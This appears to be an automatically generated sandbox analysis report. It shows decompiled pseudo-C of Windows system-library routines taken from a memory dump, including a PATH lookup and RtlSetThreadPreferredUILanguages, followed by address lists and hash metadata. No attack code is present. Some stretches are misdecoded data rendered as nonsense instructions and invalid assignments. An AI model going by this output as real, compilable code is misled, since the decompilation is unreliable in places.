											__eflags = __ebx;
											L13:
											_t283 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x13d7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01304620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E012FEB70(__ecx, 0x13d79a0);
										__eax = _v52;
										L36:
										_pop(_t315);
										_pop(_t323);
										__eflags = _v8 ^ _t327;
										_pop(_t275);
										return E0132B640(_t212, _t275, _v8 ^ _t327, _t303, _t315, _t323);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t270 = _v56;
								if(_v56 != 0) {
									_t303 =  &_v36;
									_t272 = E01312E3E(_t270,  &_v36);
									_t283 = _v36;
									_v76 = _t272;
								}
								if(_t283 == 0) {
									goto L44;
								} else {
									_t274 = _t274 + 2 + _t283;
								}
								goto L14;
							case 6:
								__eax =  *0x13d5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x13d8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x13d8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x13d6e58 & 0x0000ffff;
								__eax = ( *0x13d6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t314 = _t314 + 1;
								if(_t314 >= _v48) {
									goto L16;
								} else {
									_t303 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t288 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *_t288 =  *_t288 ^ _t237;
					asm("o16 sub [ecx], dh");
					_t238 = _t237 + _t331;
					asm("daa");
					 *_t288 =  *_t288 ^ _t238;
					 *[es:ecx] =  *[es:ecx] ^ _t238;
					_t324 = _t321 + 1;
					 *_t288 =  *_t288 - _t303;
					 *0x1f013126 =  *0x1f013126 + _t238;
					_pop(_t279);
					_t239 = _t238 ^ 0x31289401;
					 *0x201355b =  *0x201355b + _t324;
					 *_t288 =  *_t288 - _t324;
					 *((intOrPtr*)(_t239 - 0x9feced8)) =  *((intOrPtr*)(_t239 - 0x9feced8)) + _t239;
					asm("daa");
					 *_t288 =  *_t288 ^ _t239;
					_push(ds);
					 *_t288 =  *_t288 - _t303;
					 *((intOrPtr*)(_t324 + 0x28)) =  *((intOrPtr*)(_t324 + 0x28)) + _t288;
					 *_t288 =  *_t288 ^ _t239;
					asm("daa");
					 *_t288 =  *_t288 ^ _t239;
					asm("fcomp dword [ebx+0x35]");
					 *((intOrPtr*)(_t239 +  &_a1546912045)) =  *((intOrPtr*)(_t239 +  &_a1546912045)) + _t324;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x13bff00);
					E0133D08C(_t279, _t316, _t324);
					_v44 =  *[fs:0x18];
					_t317 = 0;
					 *_a24 = 0;
					_t280 = _a12;
					__eflags = _t280;
					if(_t280 == 0) {
						_t243 = 0xc0000100;
					} else {
						_v8 = 0;
						_t325 = 0xc0000100;
						_v52 = 0xc0000100;
						_t245 = 4;
						while(1) {
							_v40 = _t245;
							__eflags = _t245;
							if(_t245 == 0) {
								break;
							}
							_t293 = _t245 * 0xc;
							_v48 = _t293;
							__eflags = _t280 -  *((intOrPtr*)(_t293 + 0x12c1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t260 = E0132E5C0(_a8,  *((intOrPtr*)(_t293 + 0x12c1668)), _t280);
									_t331 = _t331 + 0xc;
									__eflags = _t260;
									if(__eflags == 0) {
										_t325 = E013651BE(_t280,  *((intOrPtr*)(_v48 + 0x12c166c)), _a16, _t317, _t325, __eflags, _a20, _a24);
										_v52 = _t325;
										break;
									} else {
										_t245 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t245 = _t245 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t325;
						__eflags = _t325;
						if(_t325 < 0) {
							__eflags = _t325 - 0xc0000100;
							if(_t325 == 0xc0000100) {
								_t289 = _a4;
								__eflags = _t289;
								if(_t289 != 0) {
									_v36 = _t289;
									__eflags =  *_t289 - _t317;
									if( *_t289 == _t317) {
										_t325 = 0xc0000100;
										goto L76;
									} else {
										_t305 =  *((intOrPtr*)(_v44 + 0x30));
										_t247 =  *((intOrPtr*)(_t305 + 0x10));
										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t289;
										if( *((intOrPtr*)(_t247 + 0x48)) == _t289) {
											__eflags =  *(_t305 + 0x1c);
											if( *(_t305 + 0x1c) == 0) {
												L106:
												_t325 = E01312AE4( &_v36, _a8, _t280, _a16, _a20, _a24);
												_v32 = _t325;
												__eflags = _t325 - 0xc0000100;
												if(_t325 != 0xc0000100) {
													goto L69;
												} else {
													_t317 = 1;
													_t289 = _v36;
													goto L75;
												}
											} else {
												_t250 = E012F6600( *(_t305 + 0x1c));
												__eflags = _t250;
												if(_t250 != 0) {
													goto L106;
												} else {
													_t289 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t325 = E01312C50(_t289, _a8, _t280, _a16, _a20, _a24, _t317);
											L76:
											_v32 = _t325;
											goto L69;
										}
									}
									goto L108;
								} else {
									E012FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t325 = _a24;
									_t257 = E01312AE4( &_v36, _a8, _t280, _a16, _a20, _t325);
									_v32 = _t257;
									__eflags = _t257 - 0xc0000100;
									if(_t257 == 0xc0000100) {
										_v32 = E01312C50(_v36, _a8, _t280, _a16, _a20, _t325, 1);
									}
									_v8 = _t317;
									E01312ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t243 = _t325;
					}
					L70:
					return E0133D0D1(_t243);
				}
				L108:
			}





















































                            0x01312584
                            0x01312586
                            0x01312590
                            0x01312596
                            0x01312597
                            0x01312598
                            0x01312599
                            0x0131259e
                            0x013125a4
                            0x013125a9
                            0x013125ac
                            0x013125ae
                            0x013125b1
                            0x013125b2
                            0x013125b5
                            0x013125b8
                            0x013125bb
                            0x013125bc
                            0x013125bf
                            0x013125c2
                            0x013125c5
                            0x013125c6
                            0x013125cb
                            0x013125ce
                            0x013125d8
                            0x013125dd
                            0x013125de
                            0x013125e1
                            0x013125e3
                            0x013125e9
                            0x013126da
                            0x013126da
                            0x013126dd
                            0x013126e2
                            0x01355b56
                            0x00000000
                            0x013126e8
                            0x013126f9
                            0x013126fb
                            0x013126fe
                            0x01312700
                            0x01355b60
                            0x00000000
                            0x01312706
                            0x01312706
                            0x0131270a
                            0x0131270a
                            0x0131270d
                            0x01312713
                            0x01312716
                            0x01312718
                            0x0131271c
                            0x0131271e
                            0x01355b6c
                            0x01355b6f
                            0x01355b7f
                            0x01355b89
                            0x01355b8e
                            0x01355b93
                            0x01355b96
                            0x01355b9c
                            0x01355ba0
                            0x01355ba3
                            0x01355bab
                            0x01355bb0
                            0x01355bb3
                            0x01355bb3
                            0x01355ba3
                            0x01312724
                            0x01312726
                            0x01312729
                            0x0131272c
                            0x0131279d
                            0x0131279d
                            0x013127a0
                            0x013127a2
                            0x00000000
                            0x0131272e
                            0x0131272e
                            0x01312731
                            0x01312734
                            0x01312734
                            0x01312736
                            0x01355bc1
                            0x01355bc1
                            0x01355bc4
                            0x00000000
                            0x01355bca
                            0x01355bca
                            0x01355bcd
                            0x00000000
                            0x01355bd3
                            0x00000000
                            0x01355bd3
                            0x01355bcd
                            0x0131273c
                            0x0131273c
                            0x01312742
                            0x01312747
                            0x0131274a
                            0x0131274d
                            0x01312750
                            0x00000000
                            0x01312756
                            0x01312756
                            0x00000000
                            0x01312902
                            0x01312908
                            0x0131290b
                            0x00000000
                            0x01312911
                            0x0131291c
                            0x01312921
                            0x00000000
                            0x01312921
                            0x00000000
                            0x00000000
                            0x01312880
                            0x01312887
                            0x0131288c
                            0x00000000
                            0x00000000
                            0x01312805
                            0x0131280a
                            0x01312814
                            0x01312816
                            0x00000000
                            0x00000000
                            0x0131281e
                            0x01312821
                            0x01312823
                            0x00000000
                            0x01312829
                            0x01312829
                            0x01312831
                            0x0131283c
                            0x0131283e
                            0x00000000
                            0x0131283e
                            0x00000000
                            0x00000000
                            0x0131284e
                            0x01312850
                            0x01312851
                            0x01312854
                            0x01312857
                            0x0131285a
                            0x0131285c
                            0x0131285d
                            0x00000000
                            0x00000000
                            0x0131275d
                            0x01312761
                            0x00000000
                            0x01312767
                            0x0131276e
                            0x01312773
                            0x01312773
                            0x01312776
                            0x01312778
                            0x0131277e
                            0x0131277e
                            0x01312781
                            0x01312781
                            0x01312783
                            0x01312784
                            0x00000000
                            0x00000000
                            0x01355bd8
                            0x01355bde
                            0x01355be4
                            0x01355be6
                            0x01355be8
                            0x01355be9
                            0x01355bee
                            0x01355bf8
                            0x01355bff
                            0x01355c01
                            0x01355c04
                            0x01355c07
                            0x01355c0b
                            0x01355c0d
                            0x01355c0d
                            0x01355c15
                            0x01355c18
                            0x01355c1b
                            0x01355c1b
                            0x01355c1e
                            0x00000000
                            0x00000000
                            0x013128c3
                            0x013128c8
                            0x013128d2
                            0x013128d4
                            0x013128d8
                            0x013128db
                            0x01355c26
                            0x01355c28
                            0x01355c2d
                            0x01355c2d
                            0x00000000
                            0x00000000
                            0x01355c34
                            0x01355c36
                            0x01355c49
                            0x01355c4e
                            0x01355c54
                            0x01355c5b
                            0x01355c5d
                            0x01355c60
                            0x01312788
                            0x01312788
                            0x0131278b
                            0x0131278e
                            0x0131278e
                            0x0131278e
                            0x01312791
                            0x00000000
                            0x00000000
                            0x01312756
                            0x01312750
                            0x00000000
                            0x01312794
                            0x01312794
                            0x01312795
                            0x01312798
                            0x01312798
                            0x00000000
                            0x01312734
                            0x0131272c
                            0x01312700
                            0x013125ef
                            0x013125ef
                            0x013125ef
                            0x013125f2
                            0x013125f8
                            0x00000000
                            0x00000000
                            0x013125fe
                            0x00000000
                            0x013128e6
                            0x013128ec
                            0x013128ef
                            0x013128f5
                            0x013128f8
                            0x013128f8
                            0x00000000
                            0x013128f8
                            0x00000000
                            0x00000000
                            0x01312866
                            0x01312866
                            0x01312876
                            0x01312879
                            0x00000000
                            0x00000000
                            0x013127e0
                            0x013127e7
                            0x013127e9
                            0x013127eb
                            0x01355afd
                            0x00000000
                            0x01355afd
                            0x00000000
                            0x00000000
                            0x01312633
                            0x01312638
                            0x0131263b
                            0x0131263c
                            0x0131263e
                            0x01312640
                            0x01312642
                            0x01312647
                            0x01312649
                            0x0131264e
                            0x01312650
                            0x01312653
                            0x01312659
                            0x013126a2
                            0x013126a7
                            0x013126ac
                            0x013126b2
                            0x01355b11
                            0x01355b15
                            0x01355b17
                            0x00000000
                            0x013126b8
                            0x013126b8
                            0x013126ba
                            0x013127a6
                            0x013127a6
                            0x013127a9
                            0x013127ab
                            0x013127b9
                            0x013127b9
                            0x013127be
                            0x013127c1
                            0x013127c3
                            0x013127c5
                            0x013127c7
                            0x01355c74
                            0x01355c79
                            0x01355c79
                            0x013127c7
                            0x00000000
                            0x013126c0
                            0x013126c0
                            0x013126c3
                            0x013126c6
                            0x013126c6
                            0x013126c9
                            0x013126c9
                            0x00000000
                            0x013126c9
                            0x013126ba
                            0x0131265b
                            0x0131265b
                            0x0131265e
                            0x01312667
                            0x0131266d
                            0x01312677
                            0x0131267c
                            0x0131267f
                            0x01312681
                            0x01355b49
                            0x01355b4e
                            0x013127cd
                            0x013127d0
                            0x013127d1
                            0x013127d2
                            0x013127d4
                            0x013127dd
                            0x01312687
                            0x01312687
                            0x0131268a
                            0x0131268b
                            0x0131268e
                            0x0131268f
                            0x01312691
                            0x01312696
                            0x01312698
                            0x0131269d
                            0x0131269f
                            0x00000000
                            0x0131269f
                            0x01312681
                            0x00000000
                            0x00000000
                            0x01312846
                            0x00000000
                            0x00000000
                            0x01312605
                            0x0131260a
                            0x0131260c
                            0x01312611
                            0x01312616
                            0x01312619
                            0x01312619
                            0x0131261e
                            0x00000000
                            0x01312624
                            0x01312627
                            0x01312627
                            0x00000000
                            0x00000000
                            0x01355b1f
                            0x00000000
                            0x00000000
                            0x01312894
                            0x0131289b
                            0x0131289d
                            0x013128a1
                            0x01355b2b
                            0x01355b2e
                            0x01355b2e
                            0x013128a7
                            0x013128a9
                            0x01355b04
                            0x01355b09
                            0x01355b09
                            0x01355b09
                            0x00000000
                            0x00000000
                            0x01355b35
                            0x01355b3c
                            0x013128fb
                            0x013128fb
                            0x013126cc
                            0x013126cc
                            0x013126d0
                            0x00000000
                            0x013126d2
                            0x013126d2
                            0x00000000
                            0x013126d2
                            0x00000000
                            0x00000000
                            0x013125fe
                            0x0131292d
                            0x0131292f
                            0x01312930
                            0x01312935
                            0x01312937
                            0x01312939
                            0x0131293c
                            0x0131293e
                            0x0131293f
                            0x01312941
                            0x01312945
                            0x01312946
                            0x01312948
                            0x0131294e
                            0x0131294f
                            0x01312954
                            0x0131295a
                            0x0131295c
                            0x01312962
                            0x01312963
                            0x01312965
                            0x01312966
                            0x01312968
                            0x0131296b
                            0x0131296e
                            0x0131296f
                            0x01312971
                            0x01312974
                            0x01312980
                            0x01312981
                            0x01312982
                            0x01312983
                            0x01312984
                            0x01312985
                            0x01312986
                            0x01312987
                            0x01312988
                            0x01312989
                            0x0131298a
                            0x0131298b
                            0x0131298c
                            0x0131298d
                            0x0131298e
                            0x0131298f
                            0x01312990
                            0x01312992
                            0x01312997
                            0x013129a3
                            0x013129a6
                            0x013129ab
                            0x013129ad
                            0x013129b0
                            0x013129b2
                            0x01355c80
                            0x013129b8
                            0x013129b8
                            0x013129bb
                            0x013129c0
                            0x013129c5
                            0x013129c6
                            0x013129c6
                            0x013129c9
                            0x013129cb
                            0x00000000
                            0x00000000
                            0x013129cd
                            0x013129d0
                            0x013129d9
                            0x013129db
                            0x013129dd
                            0x01312a7f
                            0x01312a84
                            0x01312a87
                            0x01312a89
                            0x01355ca1
                            0x01355ca3
                            0x00000000
                            0x01312a8f
                            0x01312a8f
                            0x00000000
                            0x01312a8f
                            0x00000000
                            0x013129e3
                            0x013129e3
                            0x013129e3
                            0x00000000
                            0x013129e3
                            0x013129dd
                            0x00000000
                            0x013129db
                            0x013129e6
                            0x013129e9
                            0x013129eb
                            0x013129ed
                            0x013129f3
                            0x013129f5
                            0x013129f8
                            0x013129fa
                            0x01312a97
                            0x01312a9a
                            0x01312a9d
                            0x01312add
                            0x00000000
                            0x01312a9f
                            0x01312aa2
                            0x01312aa5
                            0x01312aa8
                            0x01312aab
                            0x01355cab
                            0x01355caf
                            0x01355cc5
                            0x01355cda
                            0x01355cdc
                            0x01355cdf
                            0x01355ce5
                            0x00000000
                            0x01355ceb
                            0x01355ced
                            0x01355cee
                            0x00000000
                            0x01355cee
                            0x01355cb1
                            0x01355cb4
                            0x01355cb9
                            0x01355cbb
                            0x00000000
                            0x01355cbd
                            0x01355cbd
                            0x00000000
                            0x01355cbd
                            0x01355cbb
                            0x01312ab1
                            0x01312ab1
                            0x01312ac4
                            0x01312ac6
                            0x01312ac6
                            0x00000000
                            0x01312ac6
                            0x01312aab
                            0x00000000
                            0x01312a00
                            0x01312a09
                            0x01312a0e
                            0x01312a21
                            0x01312a24
                            0x01312a35
                            0x01312a3a
                            0x01312a3d
                            0x01312a42
                            0x01312a59
                            0x01312a59
                            0x01312a5c
                            0x01312a5f
                            0x01312a5f
                            0x013129fa
                            0x013129f3
                            0x01312a64
                            0x01312a64
                            0x01312a6b
                            0x01312a6b
                            0x01312a6d
                            0x01312a72
                            0x01312a72
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: PATH
                            • API String ID: 0-1036084923
                            • Opcode ID: 6d0d5b939af5945567802f8b6c9686655b2b4ea656b99b5240ee45c562643d78
                            • Instruction ID: f1cac74310744c23635540087dff669f37985a01aa2a92594e1caf80704759d3
                            • Opcode Fuzzy Hash: 6d0d5b939af5945567802f8b6c9686655b2b4ea656b99b5240ee45c562643d78
                            • Instruction Fuzzy Hash: 6BC19071D00219DFDB29DF9DD880AAEBBB5FF48718F144429E901BB294D774A941CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                            Download Yara Rule
                            C-Code - Quality: 80%
                            			E0131FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E012FEEF0(0x13d7b60);
					_t134 =  *0x13d7b84; // 0x77ad7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x13d7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x13d7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E012F6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E012F76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01388938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E012EB150();
													}
													_t116 = E01386D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E012F75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x13d8638; // 0x0
																	_t122 = L012F38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E012F76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E012F76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0131FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L012F70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0131FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0131FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0131FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0131FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0131FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x13d7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x13d7b84 = _t75;
						_t73 = E012FEB70(_t134, 0x13d7b60);
						if( *0x13d7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E012FFF60( *0x13d7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                            0x0131fab0
                            0x0131fab2
                            0x0131fab3
                            0x0131fab4
                            0x0131fabc
                            0x0131fac0
                            0x0131fb14
                            0x0131fb17
                            0x0131fac2
                            0x0131fac8
                            0x0131facd
                            0x0131fad3
                            0x0131fad3
                            0x0131fadd
                            0x0131fb18
                            0x0131fb1b
                            0x0131fb1d
                            0x0131fb1e
                            0x0131fb1f
                            0x0131fb20
                            0x0131fb21
                            0x0131fb22
                            0x0131fb23
                            0x0131fb24
                            0x0131fb25
                            0x0131fb26
                            0x0131fb27
                            0x0131fb28
                            0x0131fb29
                            0x0131fb2a
                            0x0131fb2b
                            0x0131fb2c
                            0x0131fb2d
                            0x0131fb2e
                            0x0131fb2f
                            0x0131fb3a
                            0x0131fb3b
                            0x0131fb3e
                            0x0131fb41
                            0x0131fb44
                            0x0131fb47
                            0x0131fb4a
                            0x0131fb4d
                            0x0131fb53
                            0x0135bdcb
                            0x0135bdcb
                            0x0131fb59
                            0x0131fb5b
                            0x0131fb5b
                            0x0131fb5e
                            0x0135bdd5
                            0x0135bdd8
                            0x00000000
                            0x0135bdda
                            0x00000000
                            0x0135bdda
                            0x0131fb64
                            0x0131fb64
                            0x0131fb64
                            0x0131fb67
                            0x0131fb6e
                            0x0131fb70
                            0x0131fb72
                            0x00000000
                            0x0131fb78
                            0x0131fb7a
                            0x0131fb7a
                            0x0131fb7d
                            0x0131fb80
                            0x0135bddf
                            0x0135bde1
                            0x00000000
                            0x0135bde3
                            0x00000000
                            0x0135bde3
                            0x0131fb86
                            0x0131fb86
                            0x0131fb86
                            0x0131fb8b
                            0x0131fb90
                            0x0131fb92
                            0x0131fb94
                            0x0131fb9a
                            0x0131fb9b
                            0x0131fba1
                            0x0135bde8
                            0x0135bdeb
                            0x0135bded
                            0x0135beb5
                            0x0135beb5
                            0x0135bebb
                            0x0135bebd
                            0x0135bec3
                            0x0135bed2
                            0x0135bedd
                            0x0135bedd
                            0x0135beed
                            0x00000000
                            0x0135bdf3
                            0x0135bdfe
                            0x0135be06
                            0x0135be0b
                            0x0135be0d
                            0x0135be0f
                            0x0135be14
                            0x0135be19
                            0x0135be20
                            0x0135be25
                            0x0135be27
                            0x0135be35
                            0x0135be39
                            0x0135be46
                            0x0135be4f
                            0x0135be54
                            0x0135be56
                            0x0135bef8
                            0x0135bef8
                            0x00000000
                            0x0135be5c
                            0x0135be5c
                            0x0135be60
                            0x00000000
                            0x0135be66
                            0x0135be66
                            0x0135be7f
                            0x0135be84
                            0x0135be87
                            0x0135be89
                            0x0135be8b
                            0x0135be99
                            0x0135be9d
                            0x0135bea0
                            0x0135beac
                            0x0135beaf
                            0x0135beb1
                            0x0135beb3
                            0x0135beb3
                            0x00000000
                            0x0135bea2
                            0x0135bea2
                            0x00000000
                            0x0135bea2
                            0x0135be8d
                            0x0135be8d
                            0x0135be92
                            0x00000000
                            0x0135be92
                            0x0135be8b
                            0x0135be60
                            0x0135be3b
                            0x0135be3b
                            0x0135be3e
                            0x00000000
                            0x0135be40
                            0x0135be40
                            0x0135be44
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0135be44
                            0x0135be3e
                            0x0135be29
                            0x0135be29
                            0x00000000
                            0x0135be29
                            0x0135be27
                            0x00000000
                            0x0131fba7
                            0x0131fba7
